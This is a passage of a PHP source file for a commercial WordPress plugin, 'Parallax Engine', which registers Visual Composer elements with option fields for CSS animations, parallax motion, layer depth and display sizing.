<?php
/*
Plugin Name: Parallax Engine
Plugin URI: http://beeteam368.com/
Description: Parallax Engine that reacts to the orientation of a smart device. Where no gyroscope or motion detection hardware is available, the position of the cursor is used instead.
Author: BeeTeam368
Author URI: http://beeteam368.com/
Version: 1.0.6
License: Commercial
Text Domain: Parallax-Engine-VC
*/

if(!defined('ABSPATH')){
	die('-1');
}

if(!defined('BEETEAM368_PE_VER')){
	define('BEETEAM368_PE_VER','1.0.6');
};

if(!defined('BEETEAM368_PE_PLUGIN_URL')){
    define('BEETEAM368_PE_PLUGIN_URL', plugin_dir_url(__FILE__));
};


if(!defined('BEETEAM368_PE_PLUGIN_PATH')){
    define('BEETEAM368_PE_PLUGIN_PATH', plugin_dir_path(__FILE__));
};

if(!defined('BEETEAM368_PE_PREFIX')){
    define('BEETEAM368_PE_PREFIX', 'pe_bt_');
};

require_once('includes/functions.php');
require_once('sample-data/sample-data.php');
require_once('sample-data/sample-data-ajax.php');

if(!class_exists('beeteam368_pe_builder')) {
	class beeteam368_pe_builder {
		
		public $library = 1;
		
		/*VC Builder*/
		public function bt_pe_vc(){
			if(function_exists('vc_map')){
				$group_category				=	__('BeeTeam368', 'Parallax-Engine-VC');
				$group_display_options 		= 	__('Display Options', 'Parallax-Engine-VC');
				$group_animation_builder 	= 	__('Animation Builder', 'Parallax-Engine-VC');
				$group_Behaviours 			= 	__('Behaviours', 'Parallax-Engine-VC');
				$group_background_settings	= 	__('Background Settings', 'Parallax-Engine-VC');
				$group_height				= 	__('Height', 'Parallax-Engine-VC');
				$group_width				= 	__('Width', 'Parallax-Engine-VC');
				$group_position				= 	__('Offset', 'Parallax-Engine-VC');
				$group_margin				= 	__('Margin', 'Parallax-Engine-VC');
				
				$animation_listing			=	array(
													__('No Animation', 'Parallax-Engine-VC') => '0_pe_no_animation',	
													__('Custom Animation (For FrontEnd Developer)', 'Parallax-Engine-VC') => '0_pe_custom',
													
													__('phase', 'Parallax-Engine-VC') 		=> 			'pephase',
													__('tilt', 'Parallax-Engine-VC') 		=> 			'petilt',
													__('wave', 'Parallax-Engine-VC') 		=> 			'pewave',
													__('shaking', 'Parallax-Engine-VC')	=> 			'pelighthouse',
													__('swing(1)', 'Parallax-Engine-VC') 	=> 			'peswing',
													
													__('bounce', 'Parallax-Engine-VC') => 				'bounce',
													__('flash', 'Parallax-Engine-VC') => 				'flash',
													__('pulse', 'Parallax-Engine-VC') => 				'pulse',
													__('rubberBand', 'Parallax-Engine-VC') => 			'rubberBand',
													__('shake', 'Parallax-Engine-VC') => 				'shake',
													__('swing', 'Parallax-Engine-VC') => 				'swing',
													__('tada', 'Parallax-Engine-VC') => 				'tada',
													__('wobble', 'Parallax-Engine-VC') => 				'wobble',
													__('jello', 'Parallax-Engine-VC') => 				'jello',
													__('bounceIn', 'Parallax-Engine-VC') => 			'bounceIn',
													__('bounceInDown', 'Parallax-Engine-VC') => 		'bounceInDown',
													__('bounceInLeft', 'Parallax-Engine-VC') => 		'bounceInLeft',
													__('bounceInRight', 'Parallax-Engine-VC') => 		'bounceInRight',
													__('bounceInUp', 'Parallax-Engine-VC') => 			'bounceInUp',
													__('bounceOut', 'Parallax-Engine-VC') => 			'bounceOut',
													__('bounceOutDown', 'Parallax-Engine-VC') => 		'bounceOutDown',
													__('bounceOutLeft', 'Parallax-Engine-VC') => 		'bounceOutLeft',
													__('bounceOutRight', 'Parallax-Engine-VC') => 		'bounceOutRight',
													__('bounceOutUp', 'Parallax-Engine-VC') => 		'bounceOutUp',
													__('fadeIn', 'Parallax-Engine-VC') => 				'fadeIn',
													__('fadeInDown', 'Parallax-Engine-VC') => 			'fadeInDown',
													__('fadeInDownBig', 'Parallax-Engine-VC') => 		'fadeInDownBig',
													__('fadeInLeft', 'Parallax-Engine-VC') => 			'fadeInLeft',
													__('fadeInLeftBig', 'Parallax-Engine-VC') => 		'fadeInLeftBig',
													__('fadeInRight', 'Parallax-Engine-VC') => 		'fadeInRight',
													__('fadeInRightBig', 'Parallax-Engine-VC') => 		'fadeInRightBig',
													__('fadeInUp', 'Parallax-Engine-VC') => 			'fadeInUp',
													__('fadeInUpBig', 'Parallax-Engine-VC') => 		'fadeInUpBig',
													__('fadeOut', 'Parallax-Engine-VC') => 			'fadeOut',
													__('fadeOutDown', 'Parallax-Engine-VC') => 		'fadeOutDown',
													__('fadeOutDownBig', 'Parallax-Engine-VC') => 		'fadeOutDownBig',
													__('fadeOutLeft', 'Parallax-Engine-VC') => 		'fadeOutLeft',
													__('fadeOutLeftBig', 'Parallax-Engine-VC') => 		'fadeOutLeftBig',
													__('fadeOutRight', 'Parallax-Engine-VC') => 		'fadeOutRight',
													__('fadeOutRightBig', 'Parallax-Engine-VC') => 	'fadeOutRightBig',
													__('fadeOutUp', 'Parallax-Engine-VC') => 			'fadeOutUp',
													__('fadeOutUpBig', 'Parallax-Engine-VC') => 		'fadeOutUpBig',
													__('flipInX', 'Parallax-Engine-VC') => 			'flipInX',
													__('flipInY', 'Parallax-Engine-VC') => 			'flipInY',
													__('flipOutX', 'Parallax-Engine-VC') => 			'flipOutX',
													__('flipOutY', 'Parallax-Engine-VC') => 			'flipOutY',
													__('lightSpeedIn', 'Parallax-Engine-VC') => 		'lightSpeedIn',
													__('lightSpeedOut', 'Parallax-Engine-VC') => 		'lightSpeedOut',
													__('rotateIn', 'Parallax-Engine-VC') => 			'rotateIn',
													__('rotateInDownLeft', 'Parallax-Engine-VC') => 	'rotateInDownLeft',
													__('rotateInDownRight', 'Parallax-Engine-VC') => 	'rotateInDownRight',
													__('rotateInUpLeft', 'Parallax-Engine-VC') => 		'rotateInUpLeft',
													__('rotateInUpRight', 'Parallax-Engine-VC') => 	'rotateInUpRight',
													__('rotateOut', 'Parallax-Engine-VC') => 			'rotateOut',
													__('rotateOutDownLeft', 'Parallax-Engine-VC') => 	'rotateOutDownLeft',
													__('rotateOutDownRight', 'Parallax-Engine-VC') => 	'rotateOutDownRight',
													__('rotateOutUpLeft', 'Parallax-Engine-VC') => 	'rotateOutUpLeft',
													__('rotateOutUpRight', 'Parallax-Engine-VC') => 	'rotateOutUpRight',
													__('hinge', 'Parallax-Engine-VC') => 				'hinge',
													__('rollIn', 'Parallax-Engine-VC') => 				'rollIn',
													__('rollOut', 'Parallax-Engine-VC') => 			'rollOut',
													__('zoomIn', 'Parallax-Engine-VC') => 				'zoomIn',
													__('zoomInDown', 'Parallax-Engine-VC') => 			'zoomInDown',
													__('zoomInLeft', 'Parallax-Engine-VC') => 			'zoomInLeft',
													__('zoomInRight', 'Parallax-Engine-VC') => 		'zoomInRight',
													__('zoomInUp', 'Parallax-Engine-VC') => 			'zoomInUp',
													__('zoomOut', 'Parallax-Engine-VC') => 			'zoomOut',
													__('zoomOutDown', 'Parallax-Engine-VC') => 		'zoomOutDown',
													__('zoomOutLeft', 'Parallax-Engine-VC') => 		'zoomOutLeft',
													__('zoomOutRight', 'Parallax-Engine-VC') => 		'zoomOutRight',
													__('zoomOutUp', 'Parallax-Engine-VC') => 			'zoomOutUp',
													__('slideInDown', 'Parallax-Engine-VC') => 		'slideInDown',
													__('slideInLeft', 'Parallax-Engine-VC') => 		'slideInLeft',
													__('slideInRight', 'Parallax-Engine-VC') => 		'slideInRight',
													__('slideInUp', 'Parallax-Engine-VC') => 			'slideInUp',
													__('slideOutDown', 'Parallax-Engine-VC') => 		'slideOutDown',
													__('slideOutLeft', 'Parallax-Engine-VC') => 		'slideOutLeft',
													__('slideOutRight', 'Parallax-Engine-VC') => 		'slideOutRight',
													__('slideOutUp', 'Parallax-Engine-VC') => 			'slideOutUp',
												);
				$animation_builder0 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'dropdown',
													'heading' 		=> __('Animation Name', 'Parallax-Engine-VC'),
													'param_name' 	=> 'animation_name',
													'description' 	=> __(	'CSS3 animations allows animation of most HTML elements without using JavaScript or Flash!
																			<a target="_blank" href="http://www.w3schools.com/css/css3_animations.asp">Example</a>', 'Parallax-Engine-VC'),
													'value' 		=> $animation_listing,						
													'group'			=> $group_animation_builder
												);	
				$animation_builder1 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'textfield',
													'heading' 		=> __('Custom Animation Name', 'Parallax-Engine-VC'),
													'param_name' 	=> 'custom_animation_name',
													'description' 	=> __(	'Specify a name for the <code>@keyframes</code> animation.
																			<a target="_blank" href="http://www.w3schools.com/cssref/css3_pr_animation-name.asp">Example</a>', 'Parallax-Engine-VC'),
													'group'			=> $group_animation_builder,													
													'dependency' 	=> 	array(
																			'element' 	=> 'animation_name',
																			'value'		=> array('0_pe_custom',),
																		),
												);
				$animation_builder2 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'textarea',
													'heading' 		=> __('Custom Animation Code (CSS)', 'Parallax-Engine-VC'),
													'param_name' 	=> 'custom_animation_css',													
													'description' 	=> __('Write code to create <code>@keyframes</code>', 'Parallax-Engine-VC'),
													'value' 		=> '@keyframes customAnimationName{ 0%{} 100%{} }
@-webkit-keyframes customAnimationName{ 0%{} 100%{}}',
													'group'			=> $group_animation_builder,													
													'dependency' 	=> 	array(
																			'element' 	=> 'animation_name',
																			'value'		=> array('0_pe_custom',),
																		),
												);																											
				$animation_builder3 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'textfield',
													'heading' 		=> __('Animation Duration', 'Parallax-Engine-VC'),
													'param_name' 	=> 'animation_duration',
													'description' 	=> __(	'Make the animation complete in few seconds.
																			<a target="_blank" href="http://www.w3schools.com/cssref/css3_pr_animation-duration.asp">Example</a>.<br>
																			<strong>Ext:</strong> <code>5s</code>, <code>1.5s</code>, <code>6s</code>. If blank, defaults to <code>2s</code>', 'Parallax-Engine-VC'),
													'group'			=> $group_animation_builder,													
													'dependency' 	=> 	array(
																			'element'			 	=> 'animation_name',
																			'value_not_equal_to' 	=> array('0_pe_no_animation'),
																		),
												);
				$animation_builder4 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'textfield',
													'heading' 		=> __('Animation Timing Function', 'Parallax-Engine-VC'),
													'param_name' 	=> 'animation_timming_function',
													'description' 	=> __(	'The <code>animation-timing-function</code> specifies the speed curve of an animation.
																			<a target="_blank" href="http://www.w3schools.com/cssref/css3_pr_animation-timing-function.asp">Example</a>.<br>
																			<strong>Ext:</strong> <code>linear</code>, <code>ease</code>, <code>ease-in</code>, <code>ease-out</code>, <code>ease-in-out</code>, 
																			<code>cubic-bezier(n,n,n,n)</code>.<br>If blank, defaults to <code>linear</code>', 'Parallax-Engine-VC'),
													'group'			=> $group_animation_builder,
													'dependency' 	=> 	array(
																			'element'			 	=> 'animation_name',
																			'value_not_equal_to' 	=> array('0_pe_no_animation'),
																		),
												);	
				$animation_builder5 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'textfield',
													'heading' 		=> __('Animation Delay', 'Parallax-Engine-VC'),
													'param_name' 	=> 'animation_delay',
													'description' 	=> __(	'The <code>animation-delay</code> property specifies a delay for the start of an animation.
																			<a target="_blank" href="http://www.w3schools.com/cssref/css3_pr_animation-delay.asp">Example</a>.
																			<strong>Ext:</strong> <code>1s</code>, <code>2s</code>, <code>2.5s</code>. If blank, defaults to <code>0s</code>', 'Parallax-Engine-VC'),
													'group'			=> $group_animation_builder,
													'dependency' 	=> 	array(
																			'element'			 	=> 'animation_name',
																			'value_not_equal_to' 	=> array('0_pe_no_animation'),
																		),
												);
				$animation_builder6 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'textfield',
													'heading' 		=> __('Animation Iteration Count', 'Parallax-Engine-VC'),
													'param_name' 	=> 'animation_iteration_count',
													'description' 	=> __(	'The <code>animation-iteration-count</code> property specifies the number of times an animation should be played.
																			<a target="_blank" href="http://www.w3schools.com/cssref/css3_pr_animation-iteration-count.asp">Example</a>.
																			<strong>Ext:</strong> <code>1</code>, <code>3</code>, <code>1</code> ... or <code>infinite</code>.
																			If blank, defaults to <code>infinite</code>', 'Parallax-Engine-VC'),
													'group'			=> $group_animation_builder,
													'dependency' 	=> 	array(
																			'element'			 	=> 'animation_name',
																			'value_not_equal_to' 	=> array('0_pe_no_animation'),
																		),
												);
				$animation_builder7 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'textfield',
													'heading' 		=> __('Animation Direction', 'Parallax-Engine-VC'),
													'param_name' 	=> 'animation_direction',
													'description' 	=> __(	'The <code>animation-direction</code> property defines whether an animation should play in reverse direction or in alternate cycles.
																			<a target="_blank" href="http://www.w3schools.com/cssref/css3_pr_animation-iteration-count.asp">Example</a>.
																			<strong>Ext:</strong> <code>normal</code>, <code>alternate</code>.<br>If blank, defaults to <code>normal</code>', 'Parallax-Engine-VC'),
													'group'			=> $group_animation_builder,
													'dependency' 	=> 	array(
																			'element'			 	=> 'animation_name',
																			'value_not_equal_to' 	=> array('0_pe_no_animation'),
																		),
												);
				$animation_builder8 		=	array(
													'admin_label' 	=> true,
													'type' 			=> 'textfield',
													'heading' 		=> __('Transform Origin', 'Parallax-Engine-VC'),
													'param_name' 	=> 'transform_origin',
													'description' 	=> __(	'The <code>transform-origin</code> property allows you to change the position of transformed elements.
																			<a target="_blank" href="http://www.w3schools.com/cssref/css3_pr_transform-origin.asp">Example</a>.<br>
																			[transform-origin:x-axis y-axis z-axis] | <strong>Ext:</strong> <code>top</code>, <code>20% 40%</code>, 
																			<code>left center</code>. If blank, defaults to <code>50% 50% 0</code>', 'Parallax-Engine-VC'),
													'group'			=> $group_animation_builder,
													'dependency' 	=> 	array(
																			'element'			 	=> 'animation_name',
																			'value_not_equal_to' 	=> array('0_pe_no_animation'),
																		),
												);								
														
				vc_map(
					array(
						'name' 				=> 	__('Parallax Engine - Container', 'Parallax-Engine-VC'),
						'base' 				=> 	'pe_container',
						'content_element' 	=> 	true,
						'is_container' 		=> 	true,					
						'js_view' 			=> 	'VcColumnView',
						'as_parent' 		=> 	array('only' => 'pe_item,pe_content'),
						'category' 			=> 	$group_category,
						'icon'				=> 	BEETEAM368_PE_PLUGIN_URL.'assets/back-end/images/icon-vc-container.png',
						'params'			=> 	array(
													//Behaviours Group
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Relative Input', 'Parallax-Engine-VC'),
														'param_name' 	=> 'relativeinput',
														'description' 	=> __(	'Specifies whether or not to use the coordinate system of the <code>element</code> passed to the parallax <code>constructor</code>. 
																				<strong>Mouse input only.</strong> <code>Defaults to No (false)</code>', 'Parallax-Engine-VC'),
														'value' 		=> array(
																			__('No (false)', 'Parallax-Engine-VC') => 'false',
																			__('Yes (true)', 'Parallax-Engine-VC') => 'true',																																				
																		),						
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Clip Relative Input', 'Parallax-Engine-VC'),
														'param_name' 	=> 'cliprelativeinput',
														'description' 	=> __(	'Specifies whether or not to clip the mouse input to the bounds of the <code>element</code> passed to the parallax <code>constructor</code>.
																				<strong>Mouse input only.</strong> <code>Defaults to No (false)</code>', 'Parallax-Engine-VC'),
														'value' 		=> array(
																			__('No (false)', 'Parallax-Engine-VC') => 'false',	
																			__('Yes (true)', 'Parallax-Engine-VC') => 'true',																																			
																		),						
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('CalibrateX', 'Parallax-Engine-VC'),
														'param_name' 	=> 'calibrate_x',
														'description' 	=> __('	Specifies whether or not to cache & calculate the motion relative to the initial <code>x</code> axis value on initialisation.
																				<code>Defaults to No (false)</code>', 'Parallax-Engine-VC'),
														'value' 		=> array(
																			__('No (false)', 'Parallax-Engine-VC') => 'false',	
																			__('Yes (true)', 'Parallax-Engine-VC') => 'true',																																			
																		),
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('CalibrateY', 'Parallax-Engine-VC'),
														'param_name' 	=> 'calibrate_y',
														'description' 	=> __('	Specifies whether or not to cache & calculate the motion relative to the initial <code>y</code> axis value on initialisation. 
																				<code>Defaults to Yes (true)</code>', 'Parallax-Engine-VC'),
														'value' 		=> array(
																			__('Yes (true)', 'Parallax-Engine-VC') => 'true',
																			__('No (false)', 'Parallax-Engine-VC') => 'false',																		
																		),
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('InvertX', 'Parallax-Engine-VC'),
														'param_name' 	=> 'invert_x',
														'description' 	=> __(	'<code>true</code> moves layers in opposition to the device motion, <code>false</code> slides them away. 
																				<code>Defaults to Yes (true)</code>', 'Parallax-Engine-VC'),
														'value' 		=> array(
																			__('Yes (true)', 'Parallax-Engine-VC') => 'true',
																			__('No (false)', 'Parallax-Engine-VC') => 'false',																		
																		),
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('InvertY', 'Parallax-Engine-VC'),
														'param_name' 	=> 'invert_y',
														'description' 	=> __(	'<code>true</code> moves layers in opposition to the device motion, <code>false</code> slides them away.
																				<code>Defaults to Yes (true)</code>', 'Parallax-Engine-VC'),
														'value' 		=> array(
																			__('Yes (true)', 'Parallax-Engine-VC') => 'true',
																			__('No (false)', 'Parallax-Engine-VC') => 'false',																		
																		),
														'group'			=> $group_Behaviours,
													),										
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('LimitX (number or false (blank), not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'limit_x',
														'description' 	=> __(	'A numeric value limits the total range of motion in <code>x</code>, <code>false</code> allows layers to move with complete freedom. 
																				If blank, Defaults to <code>false</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),										
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('LimitY (number or false (blank), not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'limit_y',
														'description' 	=> __(	'A numeric value limits the total range of motion in <code>y</code>, <code>false</code> allows layers to move with complete freedom. 
																				If blank, Defaults to <code>false</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),																				
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Calibration Threshold (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'calibrationthreshold',
														'description' 	=> __('If blank, Defaults to <code>100</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),											
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Calibration Delay (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'calibrationdelay',
														'description' 	=> __('If blank, >Defaults to <code>500</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),											
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Support Delay (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'supportdelay',
														'description' 	=> __('If blank, Defaults to <code>500</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),											
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('ScalarX (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'scalar_x',
														'description' 	=> __(	'Multiplies the input motion by this value, increasing or decreasing the sensitivity of the layer motion.
																				If blank, Defaults to <code>10.0</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('ScalarY (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'scalar_y',
														'description' 	=> __(	'Multiplies the input motion by this value, increasing or decreasing the sensitivity of the layer motion.
																				If blank, Defaults to <code>10.0</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('FrictionX (number 0-1, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'friction_x',
														'description' 	=> __(	'The amount of friction the layers experience. This essentially adds some easing to the layer motion.
																				If blank, defaults to <code>1.0</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Friction Y (number 0-1, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'friction_y',
														'description' 	=> __(	'The amount of friction the layers experience. This essentially adds some easing to the layer motion.
																				If blank, defaults to <code>0.1</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('OriginX (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'origin_x',
														'description' 	=> __(	'The <code>x</code> origin of the mouse input. <code>0</code> moves the origin to the left edge, 
																				<code>1</code> to the right edge. <strong>Mouse input only.</strong>
																				If blank, defaults to <code>0.5</code> (the center).', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('OriginY (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'origin_y',
														'description' 	=> __(	'The <code>y</code> origin of the mouse input. <code>0</code> moves the origin to the top edge, 
																				<code>1</code> to the bottom edge. <strong>Mouse input only.</strong>
																				If blank Defaults to <code>0.5</code> (the center).', 'Parallax-Engine-VC'),
														'group'			=> $group_Behaviours,
													),
													//Behaviours Group	
													
													/*Display Options*/
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Height', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height',														
														'value' 		=> array(
																			__('Default (600px)', 'Parallax-Engine-VC') => '0',
																			__('Manually Set Height', 'Parallax-Engine-VC') => '1',
																			__('Full Height', 'Parallax-Engine-VC') => '2',
																			__('Height By Width (square)', 'Parallax-Engine-VC') => '3',
																			__('Height Has a Percentage Corresponding To The Width', 'Parallax-Engine-VC') => '4',																
																		),
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Fill the percentage value corresponding to the width', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_percent',
														'description'	=> __('Ext: (16:9) <code>56.25%</code>,  (16:10) <code>62.5%</code> ...', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
														'dependency' 	=> 	array(
																				'element' 	=> 'height',
																				'value'		=> array('4'),
																			),				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_desktop',
														'description'	=> __('Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code> ...', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
														'dependency' 	=> 	array(
																				'element' 	=> 'height',
																				'value'		=> array('1'),
																			),				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Small Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_small_desktop',
														'description'	=> __('Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
														'dependency' 	=> 	array(
																				'element' 	=> 'height',
																				'value'		=> array('1'),
																			),				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_tablet',
														'description'	=> __('Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
														'dependency' 	=> 	array(
																				'element' 	=> 'height',
																				'value'		=> array('1'),
																			),				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Small Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_small_tablet',
														'description'	=> __('Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
														'dependency' 	=> 	array(
																				'element' 	=> 'height',
																				'value'		=> array('1'),
																			),				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_mobile',
														'description'	=> __('Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
														'dependency' 	=> 	array(
																				'element' 	=> 'height',
																				'value'		=> array('1'),
																			),				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Small Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_small_mobile',
														'description'	=> __('Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
														'dependency' 	=> 	array(
																				'element' 	=> 'height',
																				'value'		=> array('1'),
																			),				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Content Position', 'Parallax-Engine-VC'),
														'param_name' 	=> 'content_position',
														'description'	=> __('Select content position within row.', 'Parallax-Engine-VC'),																												
														'value' 		=> array(
																			__('Top', 'Parallax-Engine-VC') => '0',
																			__('Middle', 'Parallax-Engine-VC') => '1',
																			__('Bottom', 'Parallax-Engine-VC') => '2',																		
																		),						
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Scroll Down More Button', 'Parallax-Engine-VC'),
														'param_name' 	=> 'scroll_down',																												
														'value' 		=> array(
																			__('Hidden', 'Parallax-Engine-VC') => '0',
																			__('Show', 'Parallax-Engine-VC') 	=> '1',																																				
																		),																		
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type'			=> 'colorpicker',
														'heading' 		=> __('Background Color', 'Parallax-Engine-VC'),
														'param_name' 	=> 'background_color',
														'group' 		=> $group_display_options,	
													),									
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Extra Class Name', 'Parallax-Engine-VC'),
														'param_name' 	=> 'extra_class',
														'group'			=> $group_display_options,
													),	
													/*Display Options*/
												),
					)
				);
				
				vc_map(
					array(
						'name' 				=> 	__('Parallax Engine - Layer', 'Parallax-Engine-VC'),
						'base' 				=> 	'pe_item',
						'content_element' 	=> 	true,
						'is_container' 		=> 	true,					
						'js_view' 			=> 'VcColumnView',
						'as_parent' 		=> 	array('only' => 'pe_item_builder'),
						'as_child' 			=> 	array('only' => 'pe_container'),
						'category' 			=>	$group_category,
						'icon'				=> 	BEETEAM368_PE_PLUGIN_URL.'assets/back-end/images/icon-vc-item.png',
						'params'			=> 	array(
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Depth (number 0-1, required, not be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'depth',
														'description' 	=> __(	'A depth of 0 will cause the layer to remain stationary, and a depth of 1 will cause the layer to move by the total 
																				effect of the calculated motion. Values in between 0 and 1 will cause the layer to move by an amount 
																				relative to the supplied ratio. If blank, defaults to <code>1.0</code><br>
																				<strong>Ext:</strong> <code>0.05</code>, <code>0.1</code>, <code>0.15</code>, 
																				<code>0.2</code>, <code>0.3</code>, <code>0.4</code>, <code>0.5</code>, <code>0.6</code>, <code>0.7</code>,
																				<code>0.8</code>, <code>0.85</code>, <code>0.9</code>, <code>1.0</code>', 'Parallax-Engine-VC'),														
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('z-index (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'z_index',
														'description' 	=> __(	'The <code>z-index</code> property specifies the stack order of an element.
																				<a target="_blank" href="http://www.w3schools.com/cssref/pr_pos_z-index.asp">Example</a>', 'Parallax-Engine-VC'),
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Extra Class Name', 'Parallax-Engine-VC'),
														'param_name' 	=> 'extra_class',
													),											
												)
					)
				);
				
				vc_map(
					array(
						'name' 				=> 	__('Parallax Engine - Layer Builder', 'Parallax-Engine-VC'),
						'base' 				=> 	'pe_item_builder',
						'content_element' 	=> 	true,
						'is_container' 		=> 	true,					
						'js_view' 			=> 	'VcColumnView',
						'as_child' 			=> 	array('only' => 'pe_item'),
						'category' 			=>	$group_category,
						'icon'				=> 	BEETEAM368_PE_PLUGIN_URL.'assets/back-end/images/icon-vc-item-builder.png',
						'params'			=> 	array(	
													//background settings
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Opacity (number 0-1, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'opacity',
														'description'	=> __(	'<strong>Ext:</strong> <code>0.1</code>, <code>0.3</code>, <code>0.45</code>, <code>1.0</code>
																				... Defaults to <code>1.00</code>', 'Parallax-Engine-VC'),	
														'group'			=> $group_background_settings,
													),
													array(
														'admin_label' 	=> true,
														'type'			=> 'colorpicker',
														'heading' 		=> __('Background Color', 'Parallax-Engine-VC'),
														'param_name' 	=> 'background_color',
														'group'			=> $group_background_settings,
													),
